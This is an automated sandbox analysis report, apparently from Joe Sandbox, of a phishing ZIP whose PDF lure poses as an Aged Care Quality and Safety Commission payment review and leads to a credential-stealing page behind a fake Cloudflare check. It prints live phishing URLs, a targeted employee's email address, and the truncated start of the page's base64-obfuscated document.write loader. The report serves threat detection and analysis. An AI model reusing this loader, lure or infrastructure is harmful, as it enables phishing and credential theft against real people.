Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.winZIP@33/65@18/9
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-05-23 23-01-52-135.logJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Temp1_attach_request_478000006439785.zip\Aged Care Quality And Safety Commission_Payment Review#0772-.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1608 --field-trial-handle=1596,i,10741502747019713544,8790984211731808162,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://qslprinting.us22.list-manage.com/track/click?u=a04bf63252457300eebd0f474&id=b79cb6befe&e=dfb5c8b714/#/?/anitha.pal@agedcarequality.gov.au
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2016,i,1486018253116122347,5634552884418498544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1608 --field-trial-handle=1596,i,10741502747019713544,8790984211731808162,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2016,i,1486018253116122347,5634552884418498544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Rundll32
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1446952 Sample: attach_request_478000006439... Startdate: 24/05/2024 Architecture: WINDOWS Score: 60 31 Multi AV Scanner detection for domain / URL 2->31 33 Antivirus detection for URL or domain 2->33 35 AI detected suspicious javascript 2->35 7 chrome.exe 8 2->7         started        10 Acrobat.exe 62 2->10         started        12 rundll32.exe 2->12         started        process3 dnsIp4 21 192.168.2.16, 138, 443, 49475 unknown unknown 7->21 23 239.255.255.250 unknown Reserved 7->23 14 chrome.exe 7->14         started        17 AcroCEF.exe 108 10->17         started        process5 dnsIp6 25 cloudbyteit.co.za 41.185.8.68, 443, 49712, 49717 GridhostZA South Africa 14->25 27 www.google.com 142.250.184.228, 443, 49718 GOOGLEUS United States 14->27 29 6 other IPs or domains 14->29 19 AcroCEF.exe 6 17->19         started        process7

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
ztyw.kensteg.com5%VirustotalBrowse
a.nel.cloudflare.com0%VirustotalBrowse
code.jquery.com1%VirustotalBrowse
challenges.cloudflare.com0%VirustotalBrowse
www.google.com0%VirustotalBrowse
cloudbyteit.co.za0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://ztyw.kensteg.com/82jPIO/#Danitha.pal@agedcarequality.gov.au100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://chrome.cloudflare-dns.com0%URL Reputationsafe
https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=888a0b630ed98c1b0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/888a0b630ed98c1b/1716519723558/wlYn9sv82zuVieG0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%Avira URL Cloudsafe
https://ztyw.kensteg.com/82jPIO/100%Avira URL Cloudmalware
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/204239232:1716516640:z1Q-82SQEC5453QrRVJiA-W088EwWom7wzPnNIq-U9k/888a0b630ed98c1b/0cc0942b0c543ec0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/888a0b630ed98c1b/1716519723558/23a64c74843c301532d921809f7da6984544686c1badac72581a7b16a07a776c/JAENOqaIJs85Hu60%Avira URL Cloudsafe
https://cloudbyteit.co.za/play/0%Avira URL Cloudsafe
https://ztyw.kensteg.com/favicon.ico100%Avira URL Cloudmalware
https://a.nel.cloudflare.com/report/v4?s=F2gwpimc%2Br6phS3zMmiPRXXd1zlhEaJyTFIta4sffFZTO2%2FucZQfsyOiLTVAj%2FbjfUOzyAy5LmBY1GB14dsFOApWm6tIzoHLmhlmQwERwuI7YrCT1%2BJOhgB7c1PYvw%3D%3D0%Avira URL Cloudsafe
https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.js0%Avira URL Cloudsafe
https://cloudbyteit.co.za/play/1%VirustotalBrowse
https://ZtYw.kensteg.com/82jPIO/#D100%Avira URL Cloudmalware
https://cloudbyteit.co.za/play0%Avira URL Cloudsafe
https://cloudbyteit.co.za/play1%VirustotalBrowse
https://ZtYw.kensteg.com/82jPIO/#D5%VirustotalBrowse
https://ztyw.kensteg.com/82jPIO/5%VirustotalBrowse
https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.js0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
ztyw.kensteg.com
172.67.153.178
truefalseunknown
a.nel.cloudflare.com
35.190.80.1
truefalseunknown
code.jquery.com
151.101.130.137
truefalseunknown
challenges.cloudflare.com
104.17.2.184
truefalseunknown
www.google.com
142.250.184.228
truefalseunknown
cloudbyteit.co.za
41.185.8.68
truefalseunknown
qslprinting.us22.list-manage.com
unknown
unknownfalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=888a0b630ed98c1bfalse
    • Avira URL Cloud: safe
    unknown
    https://code.jquery.com/jquery-3.6.0.min.jsfalse
    • URL Reputation: safe
    unknown
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/204239232:1716516640:z1Q-82SQEC5453QrRVJiA-W088EwWom7wzPnNIq-U9k/888a0b630ed98c1b/0cc0942b0c543ecfalse
    • Avira URL Cloud: safe
    unknown
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/888a0b630ed98c1b/1716519723558/wlYn9sv82zuVieGfalse
    • Avira URL Cloud: safe
    unknown
    https://ztyw.kensteg.com/82jPIO/false
    • 5%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
    • Avira URL Cloud: safe
    unknown
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/888a0b630ed98c1b/1716519723558/23a64c74843c301532d921809f7da6984544686c1badac72581a7b16a07a776c/JAENOqaIJs85Hu6false
    • Avira URL Cloud: safe
    unknown
    https://ztyw.kensteg.com/82jPIO/#Danitha.pal@agedcarequality.gov.autrue
    • SlashNext: Credential Stealing type: Phishing & Social Engineering
    unknown
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normalfalse
      unknown
      https://cloudbyteit.co.za/play/false
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://ztyw.kensteg.com/favicon.icofalse
      • Avira URL Cloud: malware
      unknown
      https://a.nel.cloudflare.com/report/v4?s=F2gwpimc%2Br6phS3zMmiPRXXd1zlhEaJyTFIta4sffFZTO2%2FucZQfsyOiLTVAj%2FbjfUOzyAy5LmBY1GB14dsFOApWm6tIzoHLmhlmQwERwuI7YrCT1%2BJOhgB7c1PYvw%3D%3Dfalse
      • Avira URL Cloud: safe
      unknown
      https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.jsfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://cloudbyteit.co.za/playfalse
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://chrome.cloudflare-dns.com0638b1d4-fcba-4447-bbbc-e35602466844.tmp.7.dr, 7e033aec-4203-4b11-b77f-0c2f2895010e.tmp.7.drfalse
      • URL Reputation: safe
      unknown
      https://ZtYw.kensteg.com/82jPIO/#Dchromecache_208.10.drfalse
      • 5%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      151.101.130.137
      code.jquery.comUnited States
      54113FASTLYUSfalse
      104.17.3.184
      unknownUnited States
      13335CLOUDFLARENETUSfalse
      41.185.8.68
      cloudbyteit.co.zaSouth Africa
      36943GridhostZAfalse
      239.255.255.250
      unknownReserved
      unknownunknownfalse
      172.67.153.178
      ztyw.kensteg.comUnited States
      13335CLOUDFLARENETUSfalse
      35.190.80.1
      a.nel.cloudflare.comUnited States
      15169GOOGLEUSfalse
      142.250.184.228
      www.google.comUnited States
      15169GOOGLEUSfalse
      104.17.2.184
      challenges.cloudflare.comUnited States
      13335CLOUDFLARENETUSfalse
      IP
      192.168.2.16
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1446952
      Start date and time:2024-05-24 05:01:07 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 22s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsinteractivecookbook.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:21
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:attach_request_478000006439785.zip
      Detection:MAL
      Classification:mal60.phis.winZIP@33/65@18/9
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .zip
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 104.102.49.40, 142.250.186.99, 142.250.185.206, 64.233.166.84, 23.211.8.250, 34.104.35.123, 23.22.254.206, 52.202.204.11, 52.5.13.197, 54.227.187.23, 162.159.61.3, 172.64.41.3, 2.16.241.7, 2.16.241.13, 95.101.148.135, 93.184.221.240, 2.19.126.143, 2.19.126.149
      • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, e13829.x.akamaiedge.net, clientservices.googleapis.com, wu.azureedge.net, acroipm2.adobe.com, a1952.dscq.akamai.net, clients2.google.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, swc.list-manage.com.edgekey.net, apps.identrust.com, wu-b-net.trafficmanager.net, fs.microsoft.com, identrust.edgesuite.net, accounts.google.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • Not all processes where analyzed, report is missing behavior information
      TimeTypeDescription
      23:02:02API Interceptor2x Sleep call for process: AcroCEF.exe modified
      SourceURL
      Screenshothttps://qslprinting.us22.list-manage.com/track/click?u=a04bf63252457300eebd0f474&id=b79cb6befe&e=dfb5c8b714/#/?/anitha.pal@agedcarequality.gov.au
      Screenshothttps://qslprinting.us22.list-manage.com/track/click?u=a04bf63252457300eebd0f474&id=b79cb6befe&e=dfb5c8b714/#/?/anitha.pal@agedcarequality.gov.au
      Screenshothttps://qslprinting.us22.list-manage.com/track/click?u=a04bf63252457300eebd0f474&id=b79cb6befe&e=dfb5c8b714/#/?/anitha.pal@agedcarequality.gov.au
      Screenshothttps://qslprinting.us22.list-manage.com/track/click?u=a04bf63252457300eebd0f474&id=b79cb6befe&e=dfb5c8b714/#/?/anitha.pal@agedcarequality.gov.au
      Screenshothttps://qslprinting.us22.list-manage.com/track/click?u=a04bf63252457300eebd0f474&id=b79cb6befe&e=dfb5c8b714/#/?/anitha.pal@agedcarequality.gov.au
      Screenshothttps://qslprinting.us22.list-manage.com/track/click?u=a04bf63252457300eebd0f474&id=b79cb6befe&e=dfb5c8b714/#/?/anitha.pal@agedcarequality.gov.au
      InputOutput
      URL: https://ztyw.kensteg.com/82jPIO/#Danitha.pal@agedcarequality.gov.au Model: Perplexity: mixtral-8x7b-instruct
      {
      "loginform": false,
      "reasons": [
      "The text does not contain any form fields for a username or password.",
      "The text does not mention any requirement for a user to enter a password.",
      "The text is focused on verifying the user's identity and distinguishing between human and robot activity, rather than logging in."
      ]
      }
       Verifying... CLOuOFLARE Attention: We are in the process of verifying and authenticating your identity. We've noticed unusual activity from pur network. This page checks if it's you, not a robot, sending the requests 
      URL: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normal Model: Perplexity: mixtral-8x7b-instruct
      {
      "loginform": false,
      "reasons": [
      "The text does not contain any input fields for a login form such as username or password fields.",
      "The text does not contain any submit button for a login form.",
      "The text is about verifying identity and not logging in."
      ]
      }
       Verifying... CLOuOFLARE Attention: We are in the process of verifying and authenticating your identity. We've noticed unusual activity from pur network. This page checks if it's you, not a robot, sending the requests 
      URL: https://ztyw.kensteg.com/82jPIO/#Danitha.pal@agedcarequality.gov.au Model: gpt-4o
      ```json
      {
        "riskscore": 7,
        "reasons": "The JavaScript code contains base64 encoded content which is decoded and written to the document. This is a common technique used in malicious scripts to obfuscate their true purpose. Additionally, the decoded content includes hidden input fields with potentially sensitive data such as IP addresses and URLs, which could be used for malicious purposes such as phishing or data exfiltration."
      }
      document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPk5PdlB1bG1iMDc8L3RpdGxlPg0KICAgIDxzdHlsZT4NCmJvZHkgew0KICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOw0KICBoZWlnaHQ6IDEwMCU7DQogIG92ZXJmbG93OiBoaWRkZW47DQp9DQojQ25JUkxsb3JjWCBoNHttYXJnaW4tdG9wOjA7bWFyZ2luLWJvdHRvbTouNXJlbTtmb250LXdlaWdodDo1MDA7bGluZS1oZWlnaHQ6MS4yO30NCiNDbklSTGxvcmNYIGg0e2ZvbnQtc2l6ZTpjYWxjKDEuMyk7fQ0KQG1lZGlhIChtaW4td2lkdGg6MTIwMHB4KXsNCiNDbklSTGxvcmNYIGg0e2ZvbnQtc2l6ZToxLjVyZW07fQ0KfQ0KI0NuSVJMbG9yY